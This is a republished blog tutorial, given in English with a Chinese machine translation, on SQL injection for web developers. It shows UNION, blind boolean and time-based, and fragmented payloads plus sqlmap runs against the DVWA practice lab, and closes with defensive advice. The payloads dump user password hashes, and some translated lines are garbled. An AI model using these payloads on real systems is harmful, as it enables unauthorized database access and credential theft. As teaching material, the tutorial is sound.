web开发sql注入_开发人员SQL注入

web开发sql注入

Originally published at https://omerxx.com/sql-injection-intro

最初发布在 https://omerxx.com/sql-injection-intro

SQL Injection (SQLi) accounted for more than 72% of all attacks when looking at all verticals during (2018–2019) period.- State of the internet 2019, Akamai

从(2018-2019)期间的所有垂直领域来看，SQL注入(SQLi)占所有攻击的72％以上。 -Akamai 2019年互联网状况

The quote above says it all. If there’s one attack vector to get familiar with as a web developer it’s an injection and this one in particular. On the OWASP top 10 list injections are ranked first with SQL staring high. The infamous SQLi is very common, easy to automate and can create a lot of unrepairable damage.

以上引用说明了一切。 作为Web开发人员，如果有一个熟悉的攻击媒介，那就是注入，尤其是这一点。 在OWASP上 ，排名前10位的注入在SQL的注视下排名第一。 臭名昭著的SQLi非常普遍，易于自动化，并且会造成很多不可修复的损害。

This post is a personal attempt at getting to the bottom of something I needed to know. I repeatedly tried picking it up with gists and short videos but it didn’t go “all the way down”. Getting to know SQL injection means sitting down, reading the docs and getting your hands dirty with payloads. The syntax with small and various escaping, together with poking at old SQL brain cells took a bit of an effort. A part of this effort is getting this post written.

这篇文章是我个人想要深入了解我需要知道的东西的尝试。 我反复尝试用要点和短片将其拾起，但并没有“一路下滑”。 了解 SQL注入意味着坐下来， 阅读文档 ，并弄弄有效负载。 小而繁琐的转义语法以及对旧SQL脑细胞的戳戳都花了一些力气。 这项工作的一部分就是撰写这篇文章。

Having that said, it’s important to mention that SQL injection (from here on would be referred to as SQLi) is a simple concept with many flavors. How many? as many as SQL DB flavors out there, throw into a matrix of different webforms and developer mistakes.

话虽如此，重要的是要提到SQL注入(从这里开始将被称为SQLi)是一个具有多种风格的简单概念。 多少？ 尽可能多SQL DB风格出现在各种Web表单和开发人员错误的矩阵中。

它是什么 (What is it)

SQL Injection (or SQLi in short) is a way of infiltrating a web application data without compromising the host itself. It allows the attacker to pull data from the database and in some cases source code and other sensitive information.

SQL注入(或简称SQLi )是一种渗透Web应用程序数据而不损害主机本身的方法。 它使攻击者可以从数据库中提取数据，在某些情况下还可以从源代码中提取数据和其他敏感信息。

Performing the attack requires a very simple “hacking tool”: your browser, making it accessible and easy both to learn and perform.

进行攻击需要一个非常简单的“黑客工具”：您的浏览器，使其易于访问且易于学习和执行。

There are different kinds of SQLi vectors. The most common ones involve an HTTP request from the client’s browser. So, where the developer intended for the user to provide a simple input e.g. User ID, an attacker may try to inject an SQL statement. Instead of providing 1 for example, consider this input:

有多种SQLi向量。 最常见的请求涉及来自客户端浏览器的HTTP请求。 因此，在开发人员希望用户提供简单输入(例如User ID ，攻击者可能会尝试注入 SQL语句。 而不是例如提供1 ，请考虑以下输入：

1' UNION SELECT password FROM users UNION SELECT '1

If the backend code was not thought of in the context of an injection, it may be exploitable to such a query. The result is an extraction of database information through a simple web form. If successful, the attacker doesn’t need to gain access to the physical server. The data is extractable and available in a “legitimate” manner.

如果在注入的上下文中未考虑到后端代码，则这种查询可能会被利用。 结果是通过简单的Web表单提取数据库信息。 如果成功，则攻击者无需访问物理服务器。 数据是可提取的并且以“合法”方式可用。

如何进攻 (How to attack)

In order to set up a live example, I’m using the infamous Damn Vulnerable Web Application. It’s available in different forms but for the sake of demonstration and speed, let’s pick the quickest one with Docker:

为了建立一个生动的例子，我使用了臭名昭著的Damn Vulnerable Web Application 。 它有多种形式，但是为了演示和提高速度，让我们选择使用Docker最快的一种：

docker run --rm -it -p 8080:80 vulnerables/web-dvwa# The login screen would be @ http://localhost:8080
#
# While the login can be brute-forced, let's keep things simple for now:
# 1. Login - User: "admin", Password: "password"
# 2. Click "Create / Reset Database"
# 3. You're all set. Login again.

戳洞 (Poking for holes)

Select the “SQL Injection” module from the menu.Trying to play with possible inputs, we can see the requested parameter is a user ID, so, the first option can be 1:

从菜单中选择“ SQL Injection”模块。尝试使用可能的输入，我们可以看到请求的参数是用户ID，因此，第一个选项可以是1 ：

1# ID: 1
# First name: admin
# Surname: admin

Seems like we’re being responded with three fields: ID, First name and Surname.Let’s try an escape by providing ':

好像我们收到了三个字段的响应：ID，名字和姓氏，让我们尝试通过提供' ：

'# Output:
# You have an error in your SQL syntax; check the manual that
# corresponds to your MariaDB server version for the right
# syntax to use near ''''' at line 1

This response is valuable information here. When the application returns an error with the error message relayed from the backend, the attacker is getting live feedback to different attempts which can be used for adjustments.

此响应在这里是有价值的信息。 当应用程序返回错误并从后端中继出错误消息时，攻击者将获得实时反馈，以进行不同的尝试，以进行调整。

Sometimes, as a defense mechanism, applications return a generic error message without any informative message. Still, the attack can be executed and is called a “blind SQL injection”. More on that further on.

有时，作为一种防御机制，应用程序返回通用错误消息而没有任何提示性消息。 仍然可以执行攻击并将其称为“盲SQL注入”。 进一步了解 。

Back to our injection quest. After using ' the app returned a useful message mentioning an error near '''''. Looks like the injection is valid and the response from the DB engine is visible. This means we can try different methods and get visible feedback.

回到我们的注射任务。 在使用' ，应用程序返回了一条有用的消息，提示'''''附近的错误。 看起来注入是有效的，并且来自DB引擎的响应是可见的。 这意味着我们可以尝试不同的方法并获得可见的反馈。

The SQL UNION statement is a common helper. Using that, the attacker can unify additional information with the results and return them together. We'll try to run the next:

SQL UNION语句是常见的帮助器。 使用该工具，攻击者可以将其他信息与结果统一起来并一起返回。 我们将尝试运行下一个：

1' UNION SELECT '2# Output: The used SELECT statements have a different number of columns

First, let’s review the input:

首先，让我们回顾一下输入：

• 1' means "end the statement with 1 and close it with an apostrophe". Exactly for this reason; of being able to terminate a logical part of an SQL query, ' are dangerous when not escaped correctly.

  1'表示“以1结束语句，并用撇号将其结束”。 正是因为这个原因； 是能够终止SQL查询的逻辑部分， '都是危险的时候没有正确转义。

• UNION SELECT '2 is a UNION statement that selects a number and opening another ' to pair with the one waiting at the end of the statement in the backend code.

  UNION SELECT '2是一个UNION语句，它选择一个数字并打开另一个'以与后端代码中语句末尾的一个配对。

Now we know the UNION may work with a few tweaks. When calling an SQL statement with UNION the DB engine tries to unite the results to one set. In order to do that all parts must have the same column number so they can be unified.

现在我们知道UNION可以进行一些调整。 当使用UNION调用SQL语句时，数据库引擎会尝试将结果统一为一组。 为了做到这一点，所有部件必须具有相同的列号，以便可以统一它们。

Let’s expand the test and provide an additional column:

让我们扩展测试并提供另一列：

1' UNION SELECT 1,'2# ID: 1' UNION SELECT 1,'2
# First name: admin
# Surname: admin
# ID: 1' UNION SELECT 1,'2
# First name: 1
# Surname: 2

Boom! The injection works. Still, this is not a real extracted data. We have to find our way around the schemas in order to have something meaningful, but this is definitely promising.

繁荣！ 注射工作。 不过，这并不是真正的提取数据。 为了找到有意义的东西，我们必须找到解决方案的方式，但这绝对是有希望的。

• Step one is getting the DB name to query tables from:
  第一步是从以下位置获取数据库名称以查询表：

1' union select 2, table_schema from information_schema.tables    union select 3,'4

• This yields three sets with the databases name under “Surname”: “admin”, “dvwa”, “information_schema”.
  这将产生三组，数据库名称在“ Surname”下：“ admin”，“ dvwa”，“ information_schema”。

• We’re interested in dvwa, so we'll pick that and query its schema:

  我们对dvwa感兴趣，因此我们将选择它并查询其模式：

1' union select 2, table_name from information_schema.tables     where table_schema = 'dvwa' union select 3,'4

• The query yields table names: “admin”, “users”, “guestbook”
  该查询产生表名称：“ admin”，“ users”，“ guestbook”

• “Users” table is a usual immediate suspect that holds interesting data like usernames, passwords and other Personal Identifiable Information (PII). We’ll query that (feel free to tinker with the requests and query all available information):

  “用户”表通常是直接的可疑对象，其中包含有趣的数据，如用户名，密码和其他个人身份信息( PII )。 我们将对此进行查询(随时修改请求并查询所有可用信息)：

1' union select 2, column_name from information_schema.columns     where table_name = 'users' union select 3,'4

• We’re responded with a list of column names. “user” and “password” seems like the interesting ones.
  我们以列名称列表作为响应。 “用户”和“密码”似乎很有趣。
• We go on and make a direct query to the “users” table:
  我们继续直接查询“用户”表：

1' union select user, password from users    union select 1,2' 
# ID:  1' union select user, password from users union select 1,2' 
# First name: admin 
# Surname: admin
# ID:  1' union select user, password from users union select 1,2'
# First name: admin # Surname: 5f4dcc3b5aa765d61d8327deb882cf99 
# ID:  1' union select user, password from users union select 1,2' 
# First name: gordonb # Surname: e99a18c428cb38d5f260853678922e03 
# ID:  1' union select user, password from users union select 1,2' 
# First name: 1337 # Surname: 8d3533d75ae2c3966d7e0d4fcc69216b 
# ID:  1' union select user, password from users union select 1,2' 
# First name: pablo # Surname: 0d107d09f5bbe40cade3de5c71e9e9b7 
# ID:  1' union select user, password from users union select 1,2' 
# First name: smithy # Surname: 5f4dcc3b5aa765d61d8327deb882cf99 
# ID:  1' union select user, password from users union select 1,2' 
# First name: 1 # Surname: 2

• And there it is: a list of all users and password existing. Surprisingly (or not), passwords are in clear text and not even hashed as they should be.
  它是：现有所有用户和密码的列表。 出人意料的是(或者不是)，密码都是明文形式的，甚至没有像应该的那样散列。

安全级别：中 (Security Level: Medium)

Raising the DVWA security level under “DVWA Security” -> choose Medium.This time, instead of a plain form, we find a dropdown list with certain users to choose from. Checking the browser dev tools tells us the POST request is being sent with two parameters: id=1&Submit=Submit. Since there are more than a handful of headers we can use any kind of interceptor to catch the request and repeat it with different parameters. One favorite option is BurpSuite.

在“ DVWA Security”(DVWA安全性)下提高DVWA安全性级别->选择“ Medium ”( Medium 。这一次，我们将找到一个下拉列表，其中包含某些用户，而不是普通形式。 检查浏览器开发工具会告诉我们，正在使用两个参数发送POST请求： id=1&Submit=Submit 。 由于头文件不止几个，因此我们可以使用任何一种拦截器来捕获请求并使用不同的参数重复该请求。 一个最喜欢的选项是BurpSuite 。

Quick setup to intercept with BurpSuite

快速设置以与BurpSuite进行拦截

1. Set your requests to go through a proxy; with Firefox this is easy as going to Preferences --> Advanced --> Network Settings --> Manual Proxy Configuration and setting all protocols to go through 127.0.0.1:8080 (BurpSuite's default)

   设置您的请求以通过代理； 使用Firefox，这很容易，只需进入Preferences ->“ Advanced ->“ Network Settings ->“ Manual Proxy Configuration并设置所有协议以通过127.0.0.1:8080的默认设置)

2. Go to BurpSuite Proxy tab and set intercept on. The next request coming out of Firefox should be stopped at BS where you can decide to stop, forward or drop it

   转到BurpSuite Proxy选项卡，然后intercept on设置intercept on 。 Firefox发出的下一个请求应在BS处停止，您可以决定停止，转发或丢弃它

3. Go to DVWA SQLi page, choose an ID from the dropdown and click Submit. The request should be waiting on BurpSuite, where we can then send it to Repeater through the Actions menu.

   转到DVWA SQLi页面，从下拉列表中选择一个ID，然后单击Submit 。 该请求应在BurpSuite上等待，然后我们可以在其中通过“ Actions菜单将其发送给Repeater 。

Poking at the server by playing with the id of the POST request reveals an escape character in the form of \. So whenever a special char like ',#,-,$ appears it's being escaped. However, not being able to use special chars, does not prevent a UNION injection with the exact same syntax:

通过玩POST请求的id戳服务器，会显示\形式的转义字符。 因此，每当出现特殊字符(如',#,-,$ )时，它就会被转义。 但是，不能使用特殊字符，不能防止使用完全相同的语法进行UNION注入：

1 UNION SELECT user, password FROM users

That’s it. No escaping at all. The backend code already wraps it and fetches everything within the command fully.

而已。 根本没有逃脱。 后端代码已经将其包装并完全获取命令中的所有内容。

安全等级：高 (Security Level: High)

The last security level shows a link that pops up another window with a form that controls the request. Playing around with previous escapes shows that the code is “better” here but it still has a glitch. Comments are a good way to escape the rest of the line:

上一个安全级别显示了一个链接，该链接会弹出另一个带有控制请求的表单的窗口。 尝试使用以前的转义符可以看出，此处的代码“更好”，但仍有故障。 注释是逃避该行其余部分的好方法：

SELECT something FROM sometable # WHERE ...# Will translate into the SQL query
SELECT something FROM sometable

There are different options for commenting SQL lines, common ones are --, #, /* - multiline that ends with */.In the "real world" those are useful in describing code:

注释SQL行有不同的选项，常见的是-- ， # ， /* -以*/结尾的多行。在“真实世界”中，这些对描述代码很有用：

SELECT name -- this is the name
  FROM users -- users table
  WHERE name="DAN" -- Dan is the CEO

When it comes to SQLi, comments help ignore the rest of the code that follows, so consider this PHP code:

对于SQLi，注释有助于忽略后面的其余代码，因此请考虑以下PHP代码：

// Check database
$query  = "SELECT first_name, last_name FROM users
            WHERE user_id = '$id' LIMIT 1;";

The query is LIMITed to a single result making it hard to pull a large set of data, ignoring the LIMITation can bypass it:

该查询被LIMIT为单个结果，从而难以提取大量数据，而忽略LIMIT可以绕过它：

# First input:
1 UNION SELECT user,password from users# Translates to
SELECT first_name, last_name FROM users
  WHERE user_id = '1 union select user,password' LIMIT 1;

Since the query result is limited to one set, it will constantly return first_name, last_name, ignoring the UNION.Let's try again then:

由于查询结果仅限于一组，它将不断返回first_name, last_name ，而忽略UNION 。然后让我们再试一次：

1 UNION SELECT user,password from users## Limitation ignored
SELECT first_name, last_name FROM users
  WHERE user_id = '1 union select user,password FROM users';

盲SQLi (Blind SQLi)

A blind SQL injection is used when the application does not return the SQL error but is still vulnerable to the attack. This is virtually the same scenario as a normal SQL, but the attacker has to figure out if the vulnerability exists using a series of true / false tests. Another method is time-based. By sending SLEEP within the query, based on the time it took for the response to appear, the attacker can tell whether an answer is positive or not.

当应用程序不返回SQL错误但仍然容易受到攻击时，将使用盲SQL注入。 这实际上与普通SQL相同，但攻击者必须使用一系列正确/错误测试来确定漏洞是否存在。 另一种方法是基于时间的。 通过在查询中发送SLEEP (基于显示响应所花费的时间)，攻击者可以判断答案是否定的。

Time-based blind SQL injection relies on the database pausing for a specified amount of time, then returning the results, indicating successful SQL query executing. Using this method, an attacker enumerates each letter of the desired piece of data using the following logic:If the first letter of the first database’s name is an ‘A’, wait for 10 seconds.If the first letter of the first database’s name is an ‘B’, wait for 10 seconds. etc.

基于时间的盲SQL注入依赖于数据库暂停指定的时间量，然后返回结果，表明成功执行了SQL查询。 使用此方法，攻击者将使用以下逻辑枚举所需数据的每个字母：如果第一个数据库名称的第一个字母为'A'，则等待10秒;如果第一个数据库名称的第一个字母为一个“ B”，等待10秒钟。 等等

- Blind SQL Injection — OWASP

- 盲SQL注入— OWASP

Let’s test the DVWA blind SQLi module with the low security level. With the simple input 1 the system returns User ID exists in the database. With bad input like ' the response is 404 with a message User ID is MISSING from the database.

让我们以low安全级别测试DVWA盲SQLi模块。 使用简单输入1 ，系统将返回User ID exists in the database 。 如果输入错误(例如'则响应为404 ，消息User ID is MISSING from the database.

The next step is playing around to see if a boolean attack is optional:

下一步是研究布尔攻击是否可选：

# Input
'1 AND 1='1>> User ID exists in the database.
# Ok, that was supposed to be a truthy signal.# Input
'1 AND 1='2>> User ID is MISSING from the database.
# Good! It seems a boolean-based blind attack is valid

From here on, it’s a matter of separating known results into false/positive statements from which the attacker can derive an answer. For example:

从这里开始，需要将已知结果分为错误/肯定的陈述，攻击者可以从中得出答案。 例如：

# This input returns 404
1' and (select user from users where user_id=1)='test' and 1='1# However this is successful
# This means the name is 'admin' where user_id = 1
1' and (select user from users where user_id=1)='admin' and 1='1

碎片化SQLi (Fragmented SQLi)

A lesser-known method, but nonetheless effective can be useful when certain characters like ' are escaped, but the user can control two different fields. The obvious example is a login page. When a string is escaped by the application for example with \, the attacker may circumvent it by created his own escape like so:

一种鲜为人知的方法，但是当某些字符(如'转义时仍然有效，但是用户可以控制两个不同的字段。 一个明显的例子是登录页面。 当应用程序对字符串进行转义(例如，使用\ ，攻击者可以通过创建自己的转义来绕过字符串，如下所示：

username: \
password: or 1 #$query = select * from users where username='".$username."'
          and password='".$password."'";

This translates to:

转换为：

select * FROM users where username='\' or password=' or 1 # ';

The backslash escapes the following single-quote, creating a situation where the application reads the username value like so: '\' or password=' or 1 # '. The statement above will always return true. The hash # makes sure its following command section is ignored as a comment.

反斜杠转义以下单引号，从而导致应用程序读取用户名值的情况，例如： '\' or password=' or 1 # ' 。 上面的语句将始终返回true 。 哈希#确保其后面的命令部分作为注释被忽略。

使用sqlmap自动化事物 (Automating things with sqlmap)

One has to get familiar with the different techniques to handle different situations. But, rewriting payloads and remembering all the options is hard if you’re not an expert. Human errors and false-positive we may miss can also interfere. Sqlmap can help.

人们必须熟悉处理不同情况的不同技术。 但是，如果您不是专家，那么重写有效载荷并记住所有选项将很困难。 我们可能会错过的人为错误和假阳性也可能造成干扰。 Sqlmap可以提供帮助。

sqlmap is a CLI tool that automates the scan and provides relevant information. If possible it can grab information from the DB like database names and even tables. It will also identity blind-SQLi and report optional techniques (boolean or time based).

sqlmap是一个CLI工具，可自动执行扫描并提供相关信息。 如果可能，它可以从数据库中获取信息，例如数据库名称，甚至表。 它还将标识盲目SQLi并报告可选技术(布尔或基于时间)。

Here’s a simple operation of it on DVWA blind SQLi level

这是在DVWA盲SQLi级别上的简单操作

# Scanning the full form path with parameters
# Note how cookies are also passed to the scanner for authentication
sqlmap -u "http://localhost:8000/vulnerabilities/sqli_blind/?id=1&Submit=Submit#"
      --cookie="PHPSESSID=abcd;security=low"
      --dbssqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=1' AND 5756=5756 AND 'XWif'='XWif&Submit=Submit    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: id=1' AND (SELECT 5198 FROM (SELECT(SLEEP(5)))xyFF)
                   AND 'lswI'='lswI&Submit=Submit
---
available databases [2]:
[*] dvwa
[*] information_schema

The scanner found both the vulnerability and the fact it has to be attacked blindly. It suggests payloads and presently available databases that can be used:

扫描程序同时发现了漏洞和必须盲目攻击的事实。 它建议有效负载和可以使用的当前可用数据库：

# Running the same scan with a -D for db name
# and --tables to enumerate the dvwa db
sqlmap -u "http://localhost:8000/vulnerabilities/sqli_blind/?id=1&Submit=Submit#"
      --cookie="PHPSESSID=abcd;security=low"
      -D dvwa
      --tablesDatabase: dvwa
[2 tables]
+-----------+
| guestbook |
| users     |
+-----------+

防御 (Defense)

• “ORM” — A common belief is, that a good way of dealing with SQLi is using an ORM layer. Not only an ORM provides data structure management, but it also takes away the responsibility of building raw database queries. This is usually helpful; transferring the responsibility of making queries to more experienced hands make sense. But it should not be done blindly. While an ORM is usually a, it is not an SQLi security solution. An ORM can easily turn in to a double-edged sword. If breached, the ORM may turn into a world scale SQL injection hole. ORM users must get familiar with injection methods and test their own applications.

  “ ORM” —一个普遍的信念是，处理SQLi的好方法是使用ORM层 。 ORM不仅提供数据结构管理，而且还消除了构建原始数据库查询的责任。 通常这很有帮助； 将进行查询的责任转移给更有经验的人是有意义的。 但这不应盲目地进行。 虽然ORM通常是一个，但它不是 SQLi安全解决方案。 ORM可以轻松地变成一把双刃剑。 如果被破坏，ORM可能会变成世界范围SQL注入漏洞。 ORM用户必须熟悉注入方法并测试自己的应用程序。

“I would say it is a baseline expectation for any ORM, yes. which is likely why it’s not mentioned in docs — it’s assumed, so long as you use the ORM’s core API or query builder.and that’s where the caveat is… ORMs provide many ways to construct a database query, but they also give you the option/flexibility to write ‘raw,’ do-it-yourself queries as a string… or they allow you to write some part of a generated query as a raw string. obviously you want to avoid doing this, as it kinda defeats the purpose of using an ORM… but there is a case for it every now and again.”- TypeOrm Issue reply by @feather-hmalone

“我会说这是任何ORM的基准期望，是的。 只要您使用ORM的核心API或查询生成器，就可能会在文档中未提及它，这是假定的。这就是警告。ORM提供了许多构建数据库查询的方法，但它们也为您提供了选择/ flexibility以字符串形式编写“原始”，自己动手的查询…或者它们允许您将生成的查询的一部分编写为原始字符串。 显然，您希望避免这样做，因为它有点违背使用ORM的目的……但是， 时不时 都有这种情况。”- TypeOrm @ feather-hmalone发表的问题

• WAF — A web application firewall can be a great help by filtering incoming suspicious requests such as those of an SQLi, or cross-site scripting payloads. These too, rely on the power of their rules and can be bypassed if not implemented correctly.

  WAF — Web应用程序防火墙可以通过过滤传入的可疑请求(例如SQLi的请求或跨站点脚本有效负载)来提供很大的帮助。 这些也依赖于其规则的力量，如果实施不正确， 则可以绕开它们。

• Self-defense — Building things with best practice in mind is a good direction. It sounds obvious, but it really isn’t. Best practice mentality is great but it doesn’t mean that every responsibility can be offloaded to a different layer. When it comes to security, especially to a vector that’s responsible for the bast majority of web data leaks, one should know how to self defend. Familiarizing oneself with the attacks and the tooling can make the difference of a sensitive information leak.

  自卫 -牢记最佳实践来构建事物是一个很好的方向。 听起来很明显，但事实并非如此。 最佳实践心态很好，但这并不意味着每个职责都可以转移到另一个层。 当涉及到安全性时，尤其是对于负责大多数Web数据泄漏的媒介，人们应该知道如何进行自我防御。 熟悉攻击和工具可以使敏感信息泄漏有所不同。

I hope that by now you’re more familiar with SQLi risks and mitigations. Having attack vectors in mind helps us developers and operations protect the systems under our responsibility.

我希望到目前为止，您对SQLi风险和缓解措施更加熟悉。 牢记攻击向量有助于我们开发人员和运营机构保护我们所负责的系统。

I’ll be making more of these posts, mainly around OWASP’s top 10 vulnerabilities, so if you feel this has been helpful, stick around for more and let me know if you have any questions or feedback at all.

我将主要在OWASP的前10个漏洞中发布更多这些文章，因此，如果您觉得这很有帮助，请继续关注更多内容，并让我们知道您是否有任何疑问或反馈。

翻译自: https://medium.com/swlh/sql-injection-for-developers-9e0d91ad8cbf

web开发sql注入